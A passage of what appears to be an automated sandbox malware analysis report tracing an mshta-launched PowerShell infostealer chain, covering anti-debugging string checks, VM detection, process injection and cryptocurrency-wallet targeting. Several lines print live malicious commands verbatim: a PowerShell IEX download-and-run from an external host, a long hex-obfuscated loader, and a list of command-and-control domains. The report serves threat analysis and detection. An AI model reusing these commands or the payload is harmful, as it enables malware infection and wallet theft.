$OQIY)){WMFSF (ITLU $HZTNZ) $OQIY}}}IZOOJ;XR
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IDAQ.EXE
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5430Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3639Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3701Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6092Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7580Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4568Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4dJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\COMCTL32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\USERENV.dllJump to behavior
                Source: powershell.exe, 00000002.00000002.2152519562.0000000007930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: powershell.exe, 00000002.00000002.2158169386.0000000008A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: mshta.exe, 00000000.00000003.2163551740.0000000002951000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: powershell.exe, 00000008.00000002.4462317019.000000000069C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4463612198.00000000006D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000004.00000002.3304223704.0000000007282000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI call chain: ExitProcess graph end nodegraph_8-13078
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052B460 LdrInitializeThunk,8_2_0052B460
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi32_6624.amsi.csv, type: OTHER
                Source: Yara matchFile source: amsi32_7464.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))}
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 4F0000 value starts with: 4D5AJump to behavior
                Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
                Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
                Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
                Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
                Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
                Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
                Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
                Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: crackerdolk.click
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B09326Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function ronh($zugfp){return -split ($zugfp -replace '..', '0x$& ')};$hcnm = ronh('c3930bc54871f266aff2c12a03be01bac619730d50b7b296848b0ce355ef4aad63dad551cf518740cff825344b7c3e8930abd7e087dc165f9fa695481870bd210973ceffe5f8743015e9e067be32b8d28fc34d427f57004108d4924938d42b9c68e78c8baeec7b88edbf7e26d65bbeb339c85352398379212a4da0fda9378fa9ee2979ef8c68b2c848b07239f0fe9081e18a3e2747428eacab76496a5d46ecc618715969beb2aa550fcc19d2801e7412d5ccb10d7fc87b3ccfca2c5142fff0a92bf434e5b0634e25f43d5a1d49af292ef18995535eadd316387361090364fcdb53cf147d38015cde7c196bcb2487a645fe6e879997db0b013559ae94af7ae0a057520d706aabbbb3c4599241dc59e43af4317bbf33ff72b63c4d6f40a4cf4fba5443410e7d4fdbb2daab0b099c9cbbdf16a73778acb0aaf9970d84b1c2fe02073c14045a04f38ec73d1f5fe068051b40e010417ae6630af70e00695c608bc0861330974406c2434cdef8351aa4c08151e713b3e1161be6479227d497878812334f53852e161933df3ac49002f901ef720bd24ebc005803cc3fb5d9730a35474de935bb0da3cd0db74dd2f1a75d4c2c82def41f1f7e055aa35e28f60ebc5d1aa4cf8b043e2db0c3431ec5b92d16094a177af2c20a61c912b7de1a05e9ac70c3fc34f259afbc8229de2c7404fa77695b9b9b64b6cccc15261dd3287767966c69ca3447d29f6c28aaed13f5700dd3c2344bbbc440ef822fa03ed85a66458f8096a217892ce5bd92b17a636a13078002a9f12df30bbc21fbfc27825674e1f156c08b1f7be8110450aaafe84a212e2539e9d958c27cba9258e0f2eb2302b3c025c3e8f2af1d4975b918f51a7e4b0e2d658450a8baa98df067b355e280e6f33e6d6e729f9bf2a721e484c32fc60e22909d4a00f86690a401e2249b69a64b01b2ef84d697a10e34bfb44195cefa63c8603ac785033b7f295fb45f066e298773d832db3e9a5c2228a617a7493c760cf7b8a234974a7d9ffe59773d18e13f4c2b106a18753cb10177d79e9329a5839f3bbd922320be5c516b60190fbf08e4f48dd96d3c6fc263511d230c8ee4c5016fcaf3f85211aa23d5d686382382d564c6e8db3107fb4842199ceaabf6eb258752f65c408d2c95ba3ac3c4ba6634c579d8e2af7478d305a2b454111ca906551bede47d883c897d123dd54db270edb40162edf8558ab2673ced4556848fbd0f0ea7e491c6cb594ec95a7dc54749d99912a60c79dca4d598aa2335146b6d936341e271b5ee53dc7e88abfe799563c3f66b92d8e53182f74fe62d5e058b1d6a532974692d259673f216d5e037875df42348a3cbc56b68e7f61bb04f8de43b8b56af5f12ee9ce635f60999bd302d33d994f58d54eacf34355dbb7e858e578c3c464d9dfe385ca2ba8ca5920fa0cd69d14616cf89b14b05812b1e052ecce3f7fb706d97b865fd0c6506ce32f646039b92f147f82037e1bca4a16ede04a52f754852062cc5ffe79f1c1811c2a4ee43ff38387c4cd11a2edca6c57216dfc5d9e29adff0d5accf05998c02101cd723667780f3ece0c9d8a3501f34e27653c8cc454ac1b9cfd63c7077f0256949ad3e3daf6c6b099a8fdfbd7d13b638de640a14acfa2ed35860392cbfaf118de0ba089d071f46ab6709e49ad48a6bcb90f215d487648968f3d24e4f165e6104c06bfd0522bf67bd6fc0e5e50796821857a2fb3f2c891aabba7ef8ad692660794579db6a00d57fbaf9f2ad64863974071c4d7e8c8be2bdf8923280c6936769e41e84567c4940ebcd713f945df7292ad0c75b27f4bebdd48b6a53c89741aa6e5c0a8e6fa33c1b74178f50fa6fb6249b241dabe92267bc0a3dd4adc73a94749c2e2eeffa8da6f2a045fb97c908b9436225edf216daf831e28ac1d8377c036aa3f2324db4b8937836b29b3712ad27ebe29b03db7930c6b09326
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function ronh($zugfp){return -split ($zugfp -replace '..', '0x$& ')};$hcnm = ronh('c3930bc54871f266aff2c12a03be01bac619730d50b7b296848b0ce355ef4aad63dad551cf518740cff825344b7c3e8930abd7e087dc165f9fa695481870bd210973ceffe5f8743015e9e067be32b8d28fc34d427f57004108d4924938d42b9c68e78c8baeec7b88edbf7e26d65bbeb339c85352398379212a4da0fda9378fa9ee2979ef8c68b2c848b07239f0fe9081e18a3e2747428eacab76496a5d46ecc618715969beb2aa550fcc19d2801e7412d5ccb10d7fc87b3ccfca2c5142fff0a92bf434e5b0634e25f43d5a1d49af292ef18995535eadd316387361090364fcdb53cf147d38015cde7c196bcb2487a645fe6e879997db0b013559ae94af7ae0a057520d706aabbbb3c4599241dc59e43af4317bbf33ff72b63c4d6f40a4cf4fba5443410e7d4fdbb2daab0b099c9cbbdf16a73778acb0aaf9970d84b1c2fe02073c14045a04f38ec73d1f5fe068051b40e010417ae6630af70e00695c608bc0861330974406c2434cdef8351aa4c08151e713b3e1161be6479227d497878812334f53852e161933df3ac49002f901ef720bd24ebc005803cc3fb5d9730a35474de935bb0da3cd0db74dd2f1a75d4c2c82def41f1f7e055aa35e28f60ebc5d1aa4cf8b043e2db0c3431ec5b92d16094a177af2c20a61c912b7de1a05e9ac70c3fc34f259afbc8229de2c7404fa77695b9b9b64b6cccc15261dd3287767966c69ca3447d29f6c28aaed13f5700dd3c2344bbbc440ef822fa03ed85a66458f8096a217892ce5bd92b17a636a13078002a9f12df30bbc21fbfc27825674e1f156c08b1f7be8110450aaafe84a212e2539e9d958c27cba9258e0f2eb2302b3c025c3e8f2af1d4975b918f51a7e4b0e2d658450a8baa98df067b355e280e6f33e6d6e729f9bf2a721e484c32fc60e22909d4a00f86690a401e2249b69a64b01b2ef84d697a10e34bfb44195cefa63c8603ac785033b7f295fb45f066e298773d832db3e9a5c2228a617a7493c760cf7b8a234974a7d9ffe59773d18e13f4c2b106a18753cb10177d79e9329a5839f3bbd922320be5c516b60190fbf08e4f48dd96d3c6fc263511d230c8ee4c5016fcaf3f85211aa23d5d686382382d564c6e8db3107fb4842199ceaabf6eb258752f65c408d2c95ba3ac3c4ba6634c579d8e2af7478d305a2b454111ca906551bede47d883c897d123dd54db270edb40162edf8558ab2673ced4556848fbd0f0ea7e491c6cb594ec95a7dc54749d99912a60c79dca4d598aa2335146b6d936341e271b5ee53dc7e88abfe799563c3f66b92d8e53182f74fe62d5e058b1d6a532974692d259673f216d5e037875df42348a3cbc56b68e7f61bb04f8de43b8b56af5f12ee9ce635f60999bd302d33d994f58d54eacf34355dbb7e858e578c3c464d9dfe385ca2ba8ca5920fa0cd69d14616cf89b14b05812b1e052ecce3f7fb706d97b865fd0c6506ce32f646039b92f147f82037e1bca4a16ede04a52f754852062cc5ffe79f1c1811c2a4ee43ff38387c4cd11a2edca6c57216dfc5d9e29adff0d5accf05998c02101cd723667780f3ece0c9d8a3501f34e27653c8cc454ac1b9cfd63c7077f0256949ad3e3daf6c6b099a8fdfbd7d13b638de640a14acfa2ed35860392cbfaf118de0ba089d071f46ab6709e49ad48a6bcb90f215d487648968f3d24e4f165e6104c06bfd0522bf67bd6fc0e5e50796821857a2fb3f2c891aabba7ef8ad692660794579db6a00d57fbaf9f2ad64863974071c4d7e8c8be2bdf8923280c6936769e41e84567c4940ebcd713f945df7292ad0c75b27f4bebdd48b6a53c89741aa6e5c0a8e6fa33c1b74178f50fa6fb6249b241dabe92267bc0a3dd4adc73a94749c2e2eeffa8da6f2a045fb97c908b9436225edf216daf831e28ac1d8377c036aa3f2324db4b8937836b29b3712ad27ebe29b03db7930c6b09326Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tcpview.exe
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Wireshark.exe
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lordpe.exe
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: procexp.exe
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Procmon.exe
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autoruns.exe
                Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: regmon.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7448, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: powershell.exe, 00000008.00000002.4465039949.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *electrum*
                Source: powershell.exe, 00000008.00000002.4463612198.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: powershell.exe, 00000008.00000002.4464852873.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: powershell.exe, 00000008.00000002.4463612198.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: powershell.exe, 00000008.00000002.4465039949.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *exodus*
